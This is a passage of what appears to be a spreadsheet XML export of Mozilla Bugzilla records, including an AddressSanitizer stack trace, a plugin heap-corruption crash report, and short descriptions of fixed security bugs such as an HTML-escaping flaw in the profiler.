    #1 0x7f0f89a32078 in mozilla::dom::syncedcontext::Transaction&lt;mozilla::dom::BrowsingContext&gt;::Commit(mozilla::dom::BrowsingContext*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/SyncedContextInlines.h:92:7
    #2 0x7f0f89bcfe3a in SetHistoryEntryCount /builds/worker/workspace/obj-build/dist/include/mozilla/dom/BrowsingContext.h:227:3
    #3 0x7f0f89bcfe3a in operator() /builds/worker/checkouts/gecko/docshell/shistory/nsSHistory.cpp:1057:22
    #4 0x7f0f89bcfe3a in std::_Function_handler&lt;void (mozilla::dom::BrowsingContext*), nsSHistory::PurgeHistory(int)::$_5&gt;::_M_invoke(std::_Any_data const&amp;, mozilla::dom::BrowsingContext*&amp;&amp;) /builds/worker/fetches/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/std_function.h:316:2
    #5 0x7f0f89a3f82b in operator() /builds/worker/fetches/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/std_function.h:706:14
    #6 0x7f0f89a3f82b in mozilla::dom::BrowsingContext::PreOrderWalkVoid(std::function&lt;void (mozilla::dom::BrowsingContext*)&gt; const&amp;) /builds/worker/checkouts/gecko/docshell/base/BrowsingContext.cpp:1027:3
    #7 0x7f0f89bbabb7 in PreOrderWalk&lt;(lambda at /builds/worker/checkouts/gecko/docshell/shistory/nsSHistory.cpp:1055:27)&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/dom/BrowsingContext.h:496:7
    #8 0x7f0f89bbabb7 in nsSHistory::PurgeHistory(int) /builds/worker/checkouts/gecko/docshell/shistory/nsSHistory.cpp:1055:14
    #9 0x7f0f7ff49e31 in NS_InvokeByIndex /builds/worker/checkouts/gecko/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:101
    #10 0x7f0f818e7c29 in Invoke /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1644:10
    #11 0x7f0f818e7c29 in Call /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1197:19
    #12 0x7f0f818e7c29 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1143:23
    #13 0x7f0f818ec60c in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:922:10
    #14 0x7f0f8a7aed11 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:426:13
    #15 0x7f0f8a7aed11 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:511:12
    #16 0x7f0f8b53815e in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICFallbackStub*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/jit/BaselineIC.cpp:1595:10
    #17 0x2daaf004ad87  (&lt;unknown module&gt;)
0x61a000b3e05c is located 988 bytes inside of 1176-byte region [0x61a000b3dc80,0x61a000b3e118)
Thread T74 (WRRenderBackend) created by T26 here:
    #0 0x55cb5aa41acc in __interceptor_pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cpp:205:3
    #1 0x7f0f8d3cbc4f in std::sys::unix::thread::Thread::new::hfcb67ed381ed8607 gkrust.3qd15s5o-cgu.0
    #2 0x7f0f8e970920 in wr_window_new /builds/worker/checkouts/gecko/gfx/webrender_bindings/src/bindings.rs:1665:36
    #3 0x7f0f826cfb0e in mozilla::wr::NewRenderer::Run(mozilla::wr::RenderThread&amp;, mozilla::wr::WrWindowId) /builds/worker/checkouts/gecko/gfx/webrender_bindings/WebRenderAPI.cpp:157:10
    #4 0x7f0f8269ff4e in mozilla::wr::RenderThread::RunEvent(mozilla::wr::WrWindowId, mozilla::UniquePtr&lt;mozilla::wr::RendererEvent, mozilla::DefaultDelete&lt;mozilla::wr::RendererEvent&gt; &gt;) /builds/worker/checkouts/gecko/gfx/webrender_bindings/RenderThread.cpp:414:11 r
    #5 0x7f0f826b6636 in decltype(*(fp).*fp0(Get&lt;0ul&gt;(fp1).PassAsParameter(), Get&lt;1ul&gt;(fp1).PassAsParameter())) mozilla::detail::RunnableMethodArguments&lt;mozilla::wr::WrWindowId, mozilla::UniquePtr&lt;mozilla::wr::RendererEvent, mozilla::DefaultDelete&lt;mozilla::wr::RendererEvent&gt; &gt;&amp;&amp;&gt;::applyImpl&lt;mozilla::wr::RenderThread, void (mozilla::wr::RenderThread::*)(mozilla::wr::WrWindowId, mozilla::UniquePtr&lt;mozilla::wr::RendererEvent, mozilla::DefaultDelete&lt;mozilla::wr::RendererEvent&gt; &gt;), StoreCopyPassByConstLRef&lt;mozilla::wr::WrWindowId&gt;, StoreCopyPassByRRef&lt;mozilla::UniquePtr&lt;mozilla::wr::RendererEvent, mozilla::DefaultDelete&lt;mozilla::wr::RendererEvent&gt; &gt; &gt;, 0ul, 1ul&gt;(mozilla::wr::RenderThread*, void (mozilla::wr::RendaerThread::*)(mozilla::wr::WrWindowId, mozilla::UniquePtr&lt;mozilla::wr::RendererEvent, mozilla::DefaultDelete&lt;mozilla::wr::RendererEvent&gt; &gt;), mozilla::Tuple&lt;StoreCopyPassByConstLRef&lt;mozilla::wr::WrWindowId&gt;, StoreCopyPassByRRef&lt;mozilla::UniquePtr&lt;mozilla::wr::RendererEvent, mozilla::DefaultDelete&lt;mozilla::wr::RendererEvent&gt; &gt; &gt; &gt;&amp;, std::integer_sequence&lt;unsigned long, 0ul, 1ul&gt;) /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1148:12
    #6 0x7f0f826b639b in apply&lt;mozilla::wr::RenderThread, void (mozilla::wr::RenderThread::*)(mozilla::wr::WrWindowId, mozilla::UniquePtr&lt;mozilla::wr::RendererEvent&gt;)&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1154:12
    #7 0x7f0f826b639b in mozilla::detail::RunnableMethodImpl&lt;mozilla::wr::RenderThread*, void (mozilla::wr::RenderThread::*)(mozilla::wr::WrWindowId, mozilla::UniquePtr&lt;mozilla::wr::RendererEvent, mozilla::DefaultDelete&lt;mozilla::wr::RendererEvent&gt; &gt;), true, (mozilla::RunnableKind)0, mozilla::wr::WrWindowId, mozilla::UniquePtr&lt;mozilla::wr::RendererEvent, mozilla::DefaultDelete&lt;mozilla::wr::RendererEvent&gt; &gt;&amp;&amp;&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1201:13
    #8 0x7f0f80ecf649 in MessageLoop::RunTask(already_AddRefed&lt;nsIRunnable&gt;) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:454:11
    #9 0x7f0f80ed02de in MessageLoop::DeferOrRunPendingTask(MessageLoop::PendingTask&amp;&amp;) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:463:5
    #10 0x7f0f80ed0b6b in MessageLoop::DoWork() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:538:13
    #11 0x7f0f80ed1e26 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_pump_default.cc:35:31
    #12 0x7f0f80ecf241 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331:10
    #13 0x7f0f80ecf241 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324:3
    #14 0x7f0f80ecf241 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3
    #15 0x7f0f80eed8ea in base::Thread::ThreadMain() /builds/worker/checkouts/gecko/ipc/chromium/src/base/thread.cc:187:16
    #16 0x7f0f80ee151c in ThreadFunc(void*) /builds/worker/checkouts/gecko/ipc/chromium/src/base/platform_thread_posix.cc:40:13
    #17 0x7f0f9e0145c1 in start_thread pthread_create.c
Thread T26 created by T0 here:
    #0 0x55cb5aa41acc in __interceptor_pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cpp:205:3
    #1 0x7f0f80edb37c in CreateThread /builds/worker/checkouts/gecko/ipc/chromium/src/base/platform_thread_posix.cc:123:14
    #2 0x7f0f80edb37c in PlatformThread::Create(unsigned long, PlatformThread::Delegate*, unsigned long*) /builds/worker/checkouts/gecko/ipc/chromium/src/base/platform_thread_posix.cc:134:10
    #3 0x7f0f80eed11d in base::Thread::StartWithOptions(base::Thread::Options const&amp;) /builds/worker/checkouts/gecko/ipc/chromium/src/base/thread.cc:93:8
    #4 0x7f0f8269ae4a in mozilla::wr::RenderThread::Start() /builds/worker/checkouts/gecko/gfx/webrender_bindings/RenderThread.cpp:91:16
    #5 0x7f0f82402089 in gfxPlatform::InitLayersIPC() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1331:7
    #6 0x7f0f823fd943 in gfxPlatform::Init() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:971:3
    #7 0x7f0f823fc35b in gfxPlatform::GetPlatform() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:481:5
    #8 0x7f0f86cf2a6c in mozilla::widget::GfxInfoBase::GetContentBackend(nsTSubstring&lt;char16_t&gt;&amp;) /builds/worker/checkouts/gecko/widget/GfxInfoBase.cpp:1851:25
    #9 0x7f0f7ff49e31 in NS_InvokeByIndex /builds/worker/checkouts/gecko/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:101
    #10 0x7f0f818e7c29 in Invoke /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1644:10
    #11 0x7f0f818e7c29 in Call /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1197:19
    #12 0x7f0f818e7c29 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1143:23
    #13 0x7f0f818ed04e in GetAttribute /builds/worker/checkouts/gecko/js/xpconnect/src/xpcprivate.h:1461:12
    #14 0x7f0f818ed04e in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:962:10
    #15 0x7f0f8a7aed11 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:426:13
    #16 0x7f0f8a7aed11 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:511:12
    #17 0x7f0f8a7b090b in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:588:8
    #18 0x7f0f8a7b1bbb in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:713:10
    #19 0x7f0f8acb0be2 in CallGetter /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2040:12
    #20 0x7f0f8acb0be2 in GetExistingProperty&lt;js::CanGC&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2068:12
    #21 0x7f0f8acb0be2 in NativeGetPropertyInline&lt;js::CanGC&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2214:14
    #22 0x7f0f8acb0be2 in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2245:10
    #23 0x7f0f8a79d6fe in GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:116:10
    #24 0x7f0f8a79d6fe in GetObjectElementOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter-inl.h:419:10
    #25 0x7f0f8a79d6fe in GetElementOperationWithStackIndex /builds/worker/checkouts/gecko/js/src/vm/Interpreter-inl.h:505:10
    #26 0x7f0f8a79d6fe in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3040:12
    #27 0x7f0f8a780547 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:395:13
    #28 0x7f0f8a7aedf5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:543:13
    #29 0x7f0f8a7b090b in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:588:8
    #30 0x7f0f8a8e491c in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/jsapi.cpp:2722:10
    #31 0x7f0f818d9359 in nsXPCWrappedJS::CallMethod(unsigned short, nsXPTMethodInfo const*, nsXPTCMiniVariant*) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedJSClass.cpp:971:17
    #32 0x7f0f7ff4b7c2 in PrepareAndDispatch /builds/worker/checkouts/gecko/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:115:37
    #33 0x7f0f7ff4a54a in SharedStub xptcstubs_x86_64_linux.cpp
    #34 0x7f0f7feb6210 in NS_CreateServicesFromCategory(char const*, nsISupports*, char const*, char16_t const*) /builds/worker/checkouts/gecko/xpcom/components/nsCategoryManager.cpp:687:19
    #35 0x7f0f8a591fc9 in nsXREDirProvider::DoStartup() /builds/worker/checkouts/gecko/toolkit/xre/nsXREDirProvider.cpp:982:11
    #36 0x7f0f8a56dab8 in XREMain::XRE_mainRun() /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:4998:18
    #37 0x7f0f8a570afc in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5434:8
    #38 0x7f0f8a5718b3 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5493:21
    #39 0x55cb5aa8bd3f in do_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:225:22
    #40 0x55cb5aa8bd3f in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:378:16
    #41 0x7f0f9dfb430f in __libc_start_call_main libc-start.c
Thread T72 (WRSceneBuilder#) created by T26 here:
    #0 0x55cb5aa41acc in __interceptor_pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cpp:205:3
    #1 0x7f0f8d3cbc4f in std::sys::unix::thread::Thread::new::hfcb67ed381ed8607 gkrust.3qd15s5o-cgu.0
    #2 0x7f0f8e970920 in wr_window_new /builds/worker/checkouts/gecko/gfx/webrender_bindings/src/bindings.rs:1665:36
    #3 0x7f0f826cfb0e in mozilla::wr::NewRenderer::Run(mozilla::wr::RenderThread&amp;, mozilla::wr::WrWindowId) /builds/worker/checkouts/gecko/gfx/webrender_bindings/WebRenderAPI.cpp:157:10
    #4 0x7f0f8269ff4e in mozilla::wr::RenderThread::RunEvent(mozilla::wr::WrWindowId, mozilla::UniquePtr&lt;mozilla::wr::RendererEvent, mozilla::DefaultDelete&lt;mozilla::wr::RendererEvent&gt; &gt;) /builds/worker/checkouts/gecko/gfx/webrender_bindings/RenderThread.cpp:414:11
    #5 0x7f0f826b6636 in decltype(*(fp).*fp0(Get&lt;0ul&gt;(f</t>
        </is>
      </c>
      <c r="X145" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" t="n">
        <v>657588</v>
      </c>
      <c r="B146" t="inlineStr">
        <is>
          <t>2011-05-17 05:17:31 -0700</t>
        </is>
      </c>
      <c r="C146" t="inlineStr">
        <is>
          <t>[adbe 2875277] Crash [@ std::_Construct&lt;MessageLoop::PendingTask, MessageLoop::PendingTask&gt;(MessageLoop::PendingTask*, MessageLoop::PendingTask const&amp;) ] | ABORT: CRT ASSERT dbgheap.c(1279) : Assertion failed: _CrtIsValidHeapPointer(pUserData)</t>
        </is>
      </c>
      <c r="D146" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E146" t="n">
        <v>1</v>
      </c>
      <c r="F146" t="n">
        <v>1</v>
      </c>
      <c r="G146" t="n">
        <v>6</v>
      </c>
      <c r="H146" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I146" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J146" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K146" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L146" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M146" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N146" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O146" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P146" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q146" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R146" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S146" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T146" t="n">
        <v>1</v>
      </c>
      <c r="U146" t="n">
        <v>0</v>
      </c>
      <c r="V146" t="n">
        <v>72</v>
      </c>
      <c r="W146" t="inlineStr">
        <is>
          <t>Tested with 10.3.181.14
Crash 1
1. http://www.myspace.com/plies
2. Crash plugin-container.exe with corrupt heap during local testing.
Crash 2
1. http://www.streamiz.com/film--streaming--page-13-lecteur-.html
2. sometimes crash with corrupt heap. This may be a loaded advertisement that is periodic. This may be related to bug 651575. I believe I did see an ad from ad.xtendmedia.com/ when testing this crash.
Automation found:
Operating system: Windows NT
                  5.1.2600 Service Pack 3
CPU: x86
     GenuineIntel family 6 model 44 stepping 2
     1 CPU
Crash reason:  EXCEPTION_ACCESS_VIOLATION_WRITE
Crash address: 0x38
Assertion: Unknown assertion type 0x00000000
Thread 0 (crashed)
 0  xul.dll!std::_Construct&lt;MessageLoop::PendingTask,MessageLoop::PendingTask&gt;(MessageLoop::PendingTask *,MessageLoop::PendingTask const &amp;) [xmemory : 53 + 0x1
    eip = 0x01d4edeb   esp = 0x0012e738   ebp = 0x0012e744   ebx = 0x00000000
    esi = 0x00000001   edi = 0x07734988   eax = 0x00000038   ecx = 0x045641e0
    edx = 0x0012e7cc   efl = 0x00210202
    Found by: given as instruction pointer in context
 1  xul.dll!std::allocator&lt;MessageLoop::PendingTask&gt;::construct(MessageLoop::PendingTask *,MessageLoop::PendingTask const &amp;) [xmemory : 156 + 0xc]
    eip = 0x01d4c814   esp = 0x0012e74c   ebp = 0x0012e758
    Found by: call frame info
 2  xul.dll!std::deque&lt;MessageLoop::PendingTask,std::allocator&lt;MessageLoop::PendingTask&gt; &gt;::push_back(MessageLoop::PendingTask const &amp;) [deque : 826 + 0x2a]
    eip = 0x01d4bc46   esp = 0x0012e760   ebp = 0x0012e778
    Found by: call frame info
 3  xul.dll!std::queue&lt;MessageLoop::PendingTask,std::deque&lt;MessageLoop::PendingTask,std::allocator&lt;MessageLoop::PendingTask&gt; &gt; &gt;::push(MessageLoop::PendingTask
    eip = 0x01d4ad73   esp = 0x0012e780   ebp = 0x0012e788
    Found by: call frame info
 4  xul.dll!MessageLoop::PostTask_Helper(tracked_objects::Location const &amp;,Task *,int,bool) [message_loop.cc : 293 + 0x11]
    eip = 0x01d49f8f   esp = 0x0012e790   ebp = 0x0012e7e4
    Found by: call frame info
 5  xul.dll!MessageLoop::PostTask(tracked_objects::Location const &amp;,Task *) [message_loop.cc : 251 + 0x13]
    eip = 0x01d49e1b   esp = 0x0012e7ec   ebp = 0x0012e800
    Found by: call frame info
 6  xul.dll!mozilla::ipc::RPCChannel::EnqueuePendingMessages() [RPCChannel.cpp : 366 + 0x5c]
    eip = 0x01b3512a   esp = 0x0012e808   ebp = 0x0012e844
    Found by: call frame info
original socorro report
bp-f3ef37b3-08e9-4a9a-a7e7-19e0b2110513 Crash Report [@ UserCallWinProcCheckWow ]</t>
        </is>
      </c>
      <c r="X146" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" t="n">
        <v>557320</v>
      </c>
      <c r="B147" t="inlineStr">
        <is>
          <t>2010-04-05 13:43:11 -0700</t>
        </is>
      </c>
      <c r="C147" t="inlineStr">
        <is>
          <t>Socorro - replace NFS storage with HBase storage</t>
        </is>
      </c>
      <c r="D147" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E147" t="n">
        <v>1</v>
      </c>
      <c r="F147" t="n">
        <v>1</v>
      </c>
      <c r="G147" t="n">
        <v>4</v>
      </c>
      <c r="H147" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I147" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J147" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K147" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L147" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M147" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N147" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O147" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P147" t="inlineStr"/>
      <c r="Q147" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R147" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S147" t="inlineStr">
        <is>
          <t>1.7</t>
        </is>
      </c>
      <c r="T147" t="n">
        <v>1</v>
      </c>
      <c r="U147" t="n">
        <v>0</v>
      </c>
      <c r="V147" t="n">
        <v>2</v>
      </c>
      <c r="W147" t="inlineStr">
        <is>
          <t>rework all Socorro backend python routines to put to and get from hbase instead of nfs</t>
        </is>
      </c>
      <c r="X147" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="148">
      <c r="A148" t="n">
        <v>873966</v>
      </c>
      <c r="B148" t="inlineStr">
        <is>
          <t>2013-05-20 00:53:46 -0700</t>
        </is>
      </c>
      <c r="C148" t="inlineStr">
        <is>
          <t>Arbitrary code execution from Profiler</t>
        </is>
      </c>
      <c r="D148" t="inlineStr">
        <is>
          <t>2024-05-30 08:03:10 -0700</t>
        </is>
      </c>
      <c r="E148" t="n">
        <v>1</v>
      </c>
      <c r="F148" t="n">
        <v>1</v>
      </c>
      <c r="G148" t="n">
        <v>3</v>
      </c>
      <c r="H148" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I148" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J148" t="inlineStr">
        <is>
          <t>Performance Tools (Profiler/Timeline)</t>
        </is>
      </c>
      <c r="K148" t="inlineStr">
        <is>
          <t>21 Branch</t>
        </is>
      </c>
      <c r="L148" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M148" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N148" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O148" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P148" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q148" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R148" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S148" t="inlineStr">
        <is>
          <t>Firefox 24</t>
        </is>
      </c>
      <c r="T148" t="n">
        <v>1</v>
      </c>
      <c r="U148" t="n">
        <v>0</v>
      </c>
      <c r="V148" t="n">
        <v>44</v>
      </c>
      <c r="W148" t="inlineStr">
        <is>
          <t>It is possible to execute arbitrary code when a user examines the profiler output on a malicious website containing a specially crafted code.
The problem lies in the function |escapeHTML|, which tries to escape user-controlled strings (in this case, a URI) by writing them to the innerHTML property of a textarea element and reading it back. This approach misses the fact that the provided string can be used to close the inner text node and manipulate the DOM of the containing textarea element.</t>
        </is>
      </c>
      <c r="X148" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="149">
      <c r="A149" t="n">
        <v>783260</v>
      </c>
      <c r="B149" t="inlineStr">
        <is>
          <t>2012-08-16 07:05:12 -0700</t>
        </is>
      </c>
      <c r="C149" t="inlineStr">
        <is>
          <t>Error: Error: Permission denied to access property 'toString' when  open certain site</t>
        </is>
      </c>
      <c r="D149" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:24 -0700</t>
        </is>
      </c>
      <c r="E149" t="n">
        <v>1</v>
      </c>
      <c r="F149" t="n">
        <v>1</v>
      </c>
      <c r="G149" t="n">
        <v>3</v>
      </c>
      <c r="H149" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I149" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J149" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K149" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L149" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M149" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N149" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O149" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P149" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+]security issue fixed by 754202 on m-c</t>
        </is>
      </c>
      <c r="Q149" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R149" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S149" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T149" t="n">
        <v>1</v>
      </c>
      <c r="U149" t="n">
        <v>0</v>
      </c>
      <c r="V149" t="n">
        <v>36</v>
      </c>
      <c r="W149" t="inlineStr">
        <is>
          <t>This appears in Aurora16.0a2 and Nightly17.0a1.
(The appearance of the page does not seem to have the problem in particular.)
Step To Reproduce:
1. Load http://ww2.noticiasmvs.com/entrevistas/primera-emision-con-carmen-aristegui/postura-de-mvs-sobre-rescate-banda-25-ghz-conferencia-de-prensa-139.html
Actual Results:
  The following error shown in Error Console
  Error: Permission denied to access property 'toString</t>
        </is>
      </c>
      <c r="X149" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="150">
      <c r="A150" t="n">
        <v>222149</v>
      </c>
      <c r="B150" t="inlineStr">
        <is>
          <t>2003-10-14 12:39:15 -0700</t>
        </is>
      </c>
      <c r="C150" t="inlineStr">
        <is>
          <t>Mozilla 1.5 download page doesn't fit on 800x600 window</t>
        </is>
      </c>
      <c r="D150" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E150" t="n">
        <v>1</v>
      </c>
      <c r="F150" t="n">
        <v>1</v>
      </c>
      <c r="G150" t="n">
        <v>5</v>
      </c>
      <c r="H150" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I150" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J150" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K150" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L150" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M150" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N150" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O150" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P150" t="inlineStr"/>
      <c r="Q150" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R150" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S150" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T150" t="n">
        <v>1</v>
      </c>
      <c r="U150" t="n">
        <v>0</v>
      </c>
      <c r="V150" t="n">
        <v>6</v>
      </c>
      <c r="W150" t="inlineStr">
        <is>
